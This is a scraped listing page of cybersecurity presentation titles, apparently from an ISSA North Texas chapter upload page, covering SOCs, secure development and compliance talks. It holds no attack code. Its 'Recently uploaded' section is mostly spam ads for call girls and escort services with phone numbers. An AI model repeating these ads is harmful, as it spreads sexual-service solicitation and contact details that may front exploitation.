Next-Generation SIEM: Delivered from the Cloud Next-Generation SIEM: Delivered from the Cloud
Next-Generation SIEM: Delivered from the Cloud Alert Logic
 
Addressing cyber security
Addressing cyber securityAddressing cyber security
Addressing cyber securityFemi Ashaye
 
Healthcare info tech systems cyber threats ABI conference 2016
Healthcare info tech systems cyber threats ABI conference 2016Healthcare info tech systems cyber threats ABI conference 2016
Healthcare info tech systems cyber threats ABI conference 2016Amgad Magdy
 
Evidence-Based Security: The New Top Five Controls
Evidence-Based Security: The New Top Five ControlsEvidence-Based Security: The New Top Five Controls
Evidence-Based Security: The New Top Five ControlsPriyanka Aash
 
Effective Security Operation Center - present by Reza Adineh
Effective Security Operation Center - present by Reza AdinehEffective Security Operation Center - present by Reza Adineh
Effective Security Operation Center - present by Reza AdinehReZa AdineH
 

What's hot (20)

NTXISSACSC2 - The Role of Threat Intelligence and Layered Security for Intrus...
NTXISSACSC2 - The Role of Threat Intelligence and Layered Security for Intrus...NTXISSACSC2 - The Role of Threat Intelligence and Layered Security for Intrus...
NTXISSACSC2 - The Role of Threat Intelligence and Layered Security for Intrus...
 
Building a Next-Generation Security Operations Center (SOC)
Building a Next-Generation Security Operations Center (SOC)Building a Next-Generation Security Operations Center (SOC)
Building a Next-Generation Security Operations Center (SOC)
 
Journey to the Cloud: Securing Your AWS Applications - April 2015
Journey to the Cloud: Securing Your AWS Applications - April 2015Journey to the Cloud: Securing Your AWS Applications - April 2015
Journey to the Cloud: Securing Your AWS Applications - April 2015
 
Incident response live demo slides final
Incident response live demo slides finalIncident response live demo slides final
Incident response live demo slides final
 
DTS Solution - Building a SOC (Security Operations Center)
DTS Solution - Building a SOC (Security Operations Center)DTS Solution - Building a SOC (Security Operations Center)
DTS Solution - Building a SOC (Security Operations Center)
 
Outpost24 webinar: best practice for external attack surface management
Outpost24 webinar: best practice for external attack surface managementOutpost24 webinar: best practice for external attack surface management
Outpost24 webinar: best practice for external attack surface management
 
Top 5 Cloud Security Predictions for 2016
Top 5 Cloud Security Predictions for 2016 Top 5 Cloud Security Predictions for 2016
Top 5 Cloud Security Predictions for 2016
 
CIS Security Benchmark
CIS Security BenchmarkCIS Security Benchmark
CIS Security Benchmark
 
Security operation center (SOC)
Security operation center (SOC)Security operation center (SOC)
Security operation center (SOC)
 
Emerging Threats and Strategies of Defense
Emerging Threats and Strategies of Defense Emerging Threats and Strategies of Defense
Emerging Threats and Strategies of Defense
 
HPE Protect 2016 - Fearlessly Innovate
HPE Protect 2016 - Fearlessly InnovateHPE Protect 2016 - Fearlessly Innovate
HPE Protect 2016 - Fearlessly Innovate
 
Shared Security Responsibility in the AWS Public Cloud
Shared Security Responsibility in the AWS Public CloudShared Security Responsibility in the AWS Public Cloud
Shared Security Responsibility in the AWS Public Cloud
 
Big Data Analytics for Cyber Security: A Quick Overview
Big Data Analytics for Cyber Security: A Quick OverviewBig Data Analytics for Cyber Security: A Quick Overview
Big Data Analytics for Cyber Security: A Quick Overview
 
Outpost24 Webinar - DevOps to DevSecOps: delivering quality and secure develo...
Outpost24 Webinar - DevOps to DevSecOps: delivering quality and secure develo...Outpost24 Webinar - DevOps to DevSecOps: delivering quality and secure develo...
Outpost24 Webinar - DevOps to DevSecOps: delivering quality and secure develo...
 
Next-Generation SIEM: Delivered from the Cloud
Next-Generation SIEM: Delivered from the Cloud Next-Generation SIEM: Delivered from the Cloud
Next-Generation SIEM: Delivered from the Cloud
 
Addressing cyber security
Addressing cyber securityAddressing cyber security
Addressing cyber security
 
Healthcare info tech systems cyber threats ABI conference 2016
Healthcare info tech systems cyber threats ABI conference 2016Healthcare info tech systems cyber threats ABI conference 2016
Healthcare info tech systems cyber threats ABI conference 2016
 
Evidence-Based Security: The New Top Five Controls
Evidence-Based Security: The New Top Five ControlsEvidence-Based Security: The New Top Five Controls
Evidence-Based Security: The New Top Five Controls
 
Effective Security Operation Center - present by Reza Adineh
Effective Security Operation Center - present by Reza AdinehEffective Security Operation Center - present by Reza Adineh
Effective Security Operation Center - present by Reza Adineh
 
SOC Cyber Security
SOC Cyber SecuritySOC Cyber Security
SOC Cyber Security
 

Similar to NTXISSACSC2 - Software Assurance (SwA) by John Whited

OWASP - Building Secure Web Applications
OWASP - Building Secure Web ApplicationsOWASP - Building Secure Web Applications
OWASP - Building Secure Web Applicationsalexbe
 
Succeeding-Marriage-Cybersecurity-DevOps final
Succeeding-Marriage-Cybersecurity-DevOps finalSucceeding-Marriage-Cybersecurity-DevOps final
Succeeding-Marriage-Cybersecurity-DevOps finalrkadayam
 
BGA SOME/SOC Etkinliği - Tehdit Odaklı Güvenlik Mimarisinde Sourcefire Yakla...
BGA SOME/SOC Etkinliği - Tehdit  Odaklı Güvenlik Mimarisinde Sourcefire Yakla...BGA SOME/SOC Etkinliği - Tehdit  Odaklı Güvenlik Mimarisinde Sourcefire Yakla...
BGA SOME/SOC Etkinliği - Tehdit Odaklı Güvenlik Mimarisinde Sourcefire Yakla...BGA Cyber Security
 
Application Security Done Right
Application Security Done RightApplication Security Done Right
Application Security Done Rightpvanwoud
 
Secure DevOPS Implementation Guidance
Secure DevOPS Implementation GuidanceSecure DevOPS Implementation Guidance
Secure DevOPS Implementation GuidanceTej Luthra
 
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...Edureka!
 
Secure SDLC in mobile software development.
Secure SDLC in mobile software development.Secure SDLC in mobile software development.
Secure SDLC in mobile software development.Mykhailo Antonishyn
 
A Warrior's Journey: Building a Global AppSec Program - OWASP Global AppSec 2020
A Warrior's Journey: Building a Global AppSec Program - OWASP Global AppSec 2020A Warrior's Journey: Building a Global AppSec Program - OWASP Global AppSec 2020
A Warrior's Journey: Building a Global AppSec Program - OWASP Global AppSec 2020Brian Levine
 
Application Security on a Dime: A Practical Guide to Using Functional Open So...
Application Security on a Dime: A Practical Guide to Using Functional Open So...Application Security on a Dime: A Practical Guide to Using Functional Open So...
Application Security on a Dime: A Practical Guide to Using Functional Open So...POSSCON
 
Дмитро Терещенко, "How to secure your application with Secure SDLC"
Дмитро Терещенко, "How to secure your application with Secure SDLC"Дмитро Терещенко, "How to secure your application with Secure SDLC"
Дмитро Терещенко, "How to secure your application with Secure SDLC"Sigma Software
 
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci   Software Security in practice - Aiea torino - 30-10-2015Matteo Meucci   Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015Minded Security
 
Application Portfolio Risk Ranking: Banishing FUD With Structure and Numbers
Application Portfolio Risk Ranking: Banishing FUD With Structure and NumbersApplication Portfolio Risk Ranking: Banishing FUD With Structure and Numbers
Application Portfolio Risk Ranking: Banishing FUD With Structure and NumbersDenim Group
 
Security Checkpoints in Agile SDLC
Security Checkpoints in Agile SDLCSecurity Checkpoints in Agile SDLC
Security Checkpoints in Agile SDLCRahul Raghavan
 
Security Testing for Testing Professionals
Security Testing for Testing ProfessionalsSecurity Testing for Testing Professionals
Security Testing for Testing ProfessionalsTechWell
 
Create code confidence for better application security
Create code confidence for better application securityCreate code confidence for better application security
Create code confidence for better application securityRogue Wave Software
 
Who owns Software Security
Who owns Software SecurityWho owns Software Security
Who owns Software SecuritydevObjective
 

Similar to NTXISSACSC2 - Software Assurance (SwA) by John Whited (20)

OWASP - Building Secure Web Applications
OWASP - Building Secure Web ApplicationsOWASP - Building Secure Web Applications
OWASP - Building Secure Web Applications
 
Succeeding-Marriage-Cybersecurity-DevOps final
Succeeding-Marriage-Cybersecurity-DevOps finalSucceeding-Marriage-Cybersecurity-DevOps final
Succeeding-Marriage-Cybersecurity-DevOps final
 
BGA SOME/SOC Etkinliği - Tehdit Odaklı Güvenlik Mimarisinde Sourcefire Yakla...
BGA SOME/SOC Etkinliği - Tehdit  Odaklı Güvenlik Mimarisinde Sourcefire Yakla...BGA SOME/SOC Etkinliği - Tehdit  Odaklı Güvenlik Mimarisinde Sourcefire Yakla...
BGA SOME/SOC Etkinliği - Tehdit Odaklı Güvenlik Mimarisinde Sourcefire Yakla...
 
Application Security Done Right
Application Security Done RightApplication Security Done Right
Application Security Done Right
 
Secure DevOPS Implementation Guidance
Secure DevOPS Implementation GuidanceSecure DevOPS Implementation Guidance
Secure DevOPS Implementation Guidance
 
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...
 
Secure SDLC in mobile software development.
Secure SDLC in mobile software development.Secure SDLC in mobile software development.
Secure SDLC in mobile software development.
 
A Warrior's Journey: Building a Global AppSec Program - OWASP Global AppSec 2020
A Warrior's Journey: Building a Global AppSec Program - OWASP Global AppSec 2020A Warrior's Journey: Building a Global AppSec Program - OWASP Global AppSec 2020
A Warrior's Journey: Building a Global AppSec Program - OWASP Global AppSec 2020
 
Application Security on a Dime: A Practical Guide to Using Functional Open So...
Application Security on a Dime: A Practical Guide to Using Functional Open So...Application Security on a Dime: A Practical Guide to Using Functional Open So...
Application Security on a Dime: A Practical Guide to Using Functional Open So...
 
Дмитро Терещенко, "How to secure your application with Secure SDLC"
Дмитро Терещенко, "How to secure your application with Secure SDLC"Дмитро Терещенко, "How to secure your application with Secure SDLC"
Дмитро Терещенко, "How to secure your application with Secure SDLC"
 
Information Security and the SDLC
Information Security and the SDLCInformation Security and the SDLC
Information Security and the SDLC
 
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci   Software Security in practice - Aiea torino - 30-10-2015Matteo Meucci   Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
 
Application Portfolio Risk Ranking: Banishing FUD With Structure and Numbers
Application Portfolio Risk Ranking: Banishing FUD With Structure and NumbersApplication Portfolio Risk Ranking: Banishing FUD With Structure and Numbers
Application Portfolio Risk Ranking: Banishing FUD With Structure and Numbers
 
Security Checkpoints in Agile SDLC
Security Checkpoints in Agile SDLCSecurity Checkpoints in Agile SDLC
Security Checkpoints in Agile SDLC
 
Secure Coding and Threat Modeling
Secure Coding and Threat ModelingSecure Coding and Threat Modeling
Secure Coding and Threat Modeling
 
Security Testing for Testing Professionals
Security Testing for Testing ProfessionalsSecurity Testing for Testing Professionals
Security Testing for Testing Professionals
 
Create code confidence for better application security
Create code confidence for better application securityCreate code confidence for better application security
Create code confidence for better application security
 
OctaviusWaltonResume
OctaviusWaltonResumeOctaviusWaltonResume
OctaviusWaltonResume
 
Web Application Security Strategy
Web Application Security Strategy Web Application Security Strategy
Web Application Security Strategy
 
Who owns Software Security
Who owns Software SecurityWho owns Software Security
Who owns Software Security
 

More from North Texas Chapter of the ISSA

Ntxissacsc5 gold 4 beyond detection and prevension remediation
Ntxissacsc5 gold 4 beyond detection and prevension   remediationNtxissacsc5 gold 4 beyond detection and prevension   remediation
Ntxissacsc5 gold 4 beyond detection and prevension remediationNorth Texas Chapter of the ISSA
 
Ntxissacsc5 yellow 6-abusing protocols for dynamic addressing in space-jacenr...
Ntxissacsc5 yellow 6-abusing protocols for dynamic addressing in space-jacenr...Ntxissacsc5 yellow 6-abusing protocols for dynamic addressing in space-jacenr...
Ntxissacsc5 yellow 6-abusing protocols for dynamic addressing in space-jacenr...North Texas Chapter of the ISSA
 
Ntxissacsc5 yellow 2-evidence driven infosec compliance strategy-garrettp1
Ntxissacsc5 yellow 2-evidence driven infosec compliance strategy-garrettp1Ntxissacsc5 yellow 2-evidence driven infosec compliance strategy-garrettp1
Ntxissacsc5 yellow 2-evidence driven infosec compliance strategy-garrettp1North Texas Chapter of the ISSA
 
Ntxissacsc5 purple 4-threat detection using machine learning-markszewczul
Ntxissacsc5 purple 4-threat detection using machine learning-markszewczulNtxissacsc5 purple 4-threat detection using machine learning-markszewczul
Ntxissacsc5 purple 4-threat detection using machine learning-markszewczulNorth Texas Chapter of the ISSA
 
Ntxissacsc5 purple 3-cyber insurance essentials-shawn_tuma.pptx
Ntxissacsc5 purple 3-cyber insurance essentials-shawn_tuma.pptxNtxissacsc5 purple 3-cyber insurance essentials-shawn_tuma.pptx
Ntxissacsc5 purple 3-cyber insurance essentials-shawn_tuma.pptxNorth Texas Chapter of the ISSA
 
Ntxissacsc5 gold 1--mimecast email resiliency- erez-haimowicz
Ntxissacsc5 gold 1--mimecast email resiliency- erez-haimowiczNtxissacsc5 gold 1--mimecast email resiliency- erez-haimowicz
Ntxissacsc5 gold 1--mimecast email resiliency- erez-haimowiczNorth Texas Chapter of the ISSA
 
Ntxissacsc5 blue 7-zerotrust more effective approach to security-ed higgins
Ntxissacsc5 blue 7-zerotrust more effective approach to security-ed higginsNtxissacsc5 blue 7-zerotrust more effective approach to security-ed higgins
Ntxissacsc5 blue 7-zerotrust more effective approach to security-ed higginsNorth Texas Chapter of the ISSA
 
Ntxissacsc5 blue 6-securityawareness-laurianna_callaghan
Ntxissacsc5 blue 6-securityawareness-laurianna_callaghanNtxissacsc5 blue 6-securityawareness-laurianna_callaghan
Ntxissacsc5 blue 6-securityawareness-laurianna_callaghanNorth Texas Chapter of the ISSA
 
Ntxissacsc5 blue 5-holistic approach to cybersecurity-abu_sadeq
Ntxissacsc5 blue 5-holistic approach to cybersecurity-abu_sadeqNtxissacsc5 blue 5-holistic approach to cybersecurity-abu_sadeq
Ntxissacsc5 blue 5-holistic approach to cybersecurity-abu_sadeqNorth Texas Chapter of the ISSA
 
Ntxissacsc5 blue 3-shifting from incident to continuous response bill white
Ntxissacsc5 blue 3-shifting from  incident to continuous response bill whiteNtxissacsc5 blue 3-shifting from  incident to continuous response bill white
Ntxissacsc5 blue 3-shifting from incident to continuous response bill whiteNorth Texas Chapter of the ISSA
 
Ntxissacsc5 blue 2-herding cats and security tools-harold_toomey
Ntxissacsc5 blue 2-herding cats and security tools-harold_toomeyNtxissacsc5 blue 2-herding cats and security tools-harold_toomey
Ntxissacsc5 blue 2-herding cats and security tools-harold_toomeyNorth Texas Chapter of the ISSA
 

More from North Texas Chapter of the ISSA (20)

Purple seven-ntxissacsc5 walcutt
Purple seven-ntxissacsc5 walcuttPurple seven-ntxissacsc5 walcutt
Purple seven-ntxissacsc5 walcutt
 
Ntxissacsc5 yellow 7 protecting the cloud with cep
Ntxissacsc5 yellow 7 protecting the cloud with cepNtxissacsc5 yellow 7 protecting the cloud with cep
Ntxissacsc5 yellow 7 protecting the cloud with cep
 
Ntxissacsc5 gold 4 beyond detection and prevension remediation
Ntxissacsc5 gold 4 beyond detection and prevension   remediationNtxissacsc5 gold 4 beyond detection and prevension   remediation
Ntxissacsc5 gold 4 beyond detection and prevension remediation
 
Ntxissacsc5 gold 1 mimecast e mail resiliency
Ntxissacsc5  gold 1 mimecast e mail resiliencyNtxissacsc5  gold 1 mimecast e mail resiliency
Ntxissacsc5 gold 1 mimecast e mail resiliency
 
Ntxissacsc5 yellow 6-abusing protocols for dynamic addressing in space-jacenr...
Ntxissacsc5 yellow 6-abusing protocols for dynamic addressing in space-jacenr...Ntxissacsc5 yellow 6-abusing protocols for dynamic addressing in space-jacenr...
Ntxissacsc5 yellow 6-abusing protocols for dynamic addressing in space-jacenr...
 
Ntxissacsc5 yellow 2-evidence driven infosec compliance strategy-garrettp1
Ntxissacsc5 yellow 2-evidence driven infosec compliance strategy-garrettp1Ntxissacsc5 yellow 2-evidence driven infosec compliance strategy-garrettp1
Ntxissacsc5 yellow 2-evidence driven infosec compliance strategy-garrettp1
 
Ntxissacsc5 yellow 1-beginnerslinux bill-petersen
Ntxissacsc5 yellow 1-beginnerslinux bill-petersenNtxissacsc5 yellow 1-beginnerslinux bill-petersen
Ntxissacsc5 yellow 1-beginnerslinux bill-petersen
 
Ntxissacsc5 red 6-diy-pentest-lab dustin-dykes
Ntxissacsc5 red 6-diy-pentest-lab dustin-dykesNtxissacsc5 red 6-diy-pentest-lab dustin-dykes
Ntxissacsc5 red 6-diy-pentest-lab dustin-dykes
 
Ntxissacsc5 red 1 &amp; 2 basic hacking tools ncc group
Ntxissacsc5 red 1 &amp; 2   basic hacking tools ncc groupNtxissacsc5 red 1 &amp; 2   basic hacking tools ncc group
Ntxissacsc5 red 1 &amp; 2 basic hacking tools ncc group
 
Ntxissacsc5 purple 5-insider threat-_andy_thompson
Ntxissacsc5 purple 5-insider threat-_andy_thompsonNtxissacsc5 purple 5-insider threat-_andy_thompson
Ntxissacsc5 purple 5-insider threat-_andy_thompson
 
Ntxissacsc5 purple 4-threat detection using machine learning-markszewczul
Ntxissacsc5 purple 4-threat detection using machine learning-markszewczulNtxissacsc5 purple 4-threat detection using machine learning-markszewczul
Ntxissacsc5 purple 4-threat detection using machine learning-markszewczul
 
Ntxissacsc5 purple 3-cyber insurance essentials-shawn_tuma.pptx
Ntxissacsc5 purple 3-cyber insurance essentials-shawn_tuma.pptxNtxissacsc5 purple 3-cyber insurance essentials-shawn_tuma.pptx
Ntxissacsc5 purple 3-cyber insurance essentials-shawn_tuma.pptx
 
Ntxissacsc5 purple 1-eu-gdpr_patrick_florer
Ntxissacsc5 purple 1-eu-gdpr_patrick_florerNtxissacsc5 purple 1-eu-gdpr_patrick_florer
Ntxissacsc5 purple 1-eu-gdpr_patrick_florer
 
Ntxissacsc5 gold 1--mimecast email resiliency- erez-haimowicz
Ntxissacsc5 gold 1--mimecast email resiliency- erez-haimowiczNtxissacsc5 gold 1--mimecast email resiliency- erez-haimowicz
Ntxissacsc5 gold 1--mimecast email resiliency- erez-haimowicz
 
Ntxissacsc5 blue 7-zerotrust more effective approach to security-ed higgins
Ntxissacsc5 blue 7-zerotrust more effective approach to security-ed higginsNtxissacsc5 blue 7-zerotrust more effective approach to security-ed higgins
Ntxissacsc5 blue 7-zerotrust more effective approach to security-ed higgins
 
Ntxissacsc5 blue 6-securityawareness-laurianna_callaghan
Ntxissacsc5 blue 6-securityawareness-laurianna_callaghanNtxissacsc5 blue 6-securityawareness-laurianna_callaghan
Ntxissacsc5 blue 6-securityawareness-laurianna_callaghan
 
Ntxissacsc5 blue 5-holistic approach to cybersecurity-abu_sadeq
Ntxissacsc5 blue 5-holistic approach to cybersecurity-abu_sadeqNtxissacsc5 blue 5-holistic approach to cybersecurity-abu_sadeq
Ntxissacsc5 blue 5-holistic approach to cybersecurity-abu_sadeq
 
Ntxissacsc5 blue 3-shifting from incident to continuous response bill white
Ntxissacsc5 blue 3-shifting from  incident to continuous response bill whiteNtxissacsc5 blue 3-shifting from  incident to continuous response bill white
Ntxissacsc5 blue 3-shifting from incident to continuous response bill white
 
Ntxissacsc5 blue 4-the-attack_life_cycle_erich_mueller
Ntxissacsc5 blue 4-the-attack_life_cycle_erich_muellerNtxissacsc5 blue 4-the-attack_life_cycle_erich_mueller
Ntxissacsc5 blue 4-the-attack_life_cycle_erich_mueller
 
Ntxissacsc5 blue 2-herding cats and security tools-harold_toomey
Ntxissacsc5 blue 2-herding cats and security tools-harold_toomeyNtxissacsc5 blue 2-herding cats and security tools-harold_toomey
Ntxissacsc5 blue 2-herding cats and security tools-harold_toomey
 

Recently uploaded

APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53APNIC
 
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting  High Prof...VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting  High Prof...
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...singhpriety023
 
Real Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtReal Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtrahman018755
 
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls DubaiDubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubaikojalkojal131
 
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)Delhi Call girls
 
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...SUHANI PANDEY
 
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune  (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...Russian Call Girls Pune  (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...SUHANI PANDEY
 
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445ruhi
 
20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdfMatthew Sinclair
 
VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...
VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...
VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...SUHANI PANDEY
 
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...SUHANI PANDEY
 
Pirangut | Call Girls Pune Phone No 8005736733 Elite Escort Service Available...
Pirangut | Call Girls Pune Phone No 8005736733 Elite Escort Service Available...Pirangut | Call Girls Pune Phone No 8005736733 Elite Escort Service Available...
Pirangut | Call Girls Pune Phone No 8005736733 Elite Escort Service Available...SUHANI PANDEY
 
VIP Call Girls Himatnagar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Himatnagar 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Himatnagar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Himatnagar 7001035870 Whatsapp Number, 24/07 Bookingdharasingh5698
 
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service AvailableCall Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service AvailableSeo
 
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men  🔝mehsana🔝   Escorts...➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men  🔝mehsana🔝   Escorts...
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...nirzagarg
 
Microsoft Azure Arc Customer Deck Microsoft
Microsoft Azure Arc Customer Deck MicrosoftMicrosoft Azure Arc Customer Deck Microsoft
Microsoft Azure Arc Customer Deck MicrosoftAanSulistiyo
 
Wadgaon Sheri $ Call Girls Pune 10k @ I'm VIP Independent Escorts Girls 80057...
Wadgaon Sheri $ Call Girls Pune 10k @ I'm VIP Independent Escorts Girls 80057...Wadgaon Sheri $ Call Girls Pune 10k @ I'm VIP Independent Escorts Girls 80057...
Wadgaon Sheri $ Call Girls Pune 10k @ I'm VIP Independent Escorts Girls 80057...SUHANI PANDEY
 
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
Nanded City ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready ...Nanded City ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready ...
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...tanu pandey
 

Recently uploaded (20)

APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53
 
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting  High Prof...VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting  High Prof...
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
 
Real Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtReal Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirt
 
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls DubaiDubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
 
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
 
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
 
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune  (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...Russian Call Girls Pune  (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
 
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
 
20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf
 
VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...
VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...
VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...
 
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
 
Pirangut | Call Girls Pune Phone No 8005736733 Elite Escort Service Available...
Pirangut | Call Girls Pune Phone No 8005736733 Elite Escort Service Available...Pirangut | Call Girls Pune Phone No 8005736733 Elite Escort Service Available...
Pirangut | Call Girls Pune Phone No 8005736733 Elite Escort Service Available...
 
VIP Call Girls Himatnagar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Himatnagar 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Himatnagar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Himatnagar 7001035870 Whatsapp Number, 24/07 Booking
 
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
 
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service AvailableCall Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
 
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men  🔝mehsana🔝   Escorts...➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men  🔝mehsana🔝   Escorts...
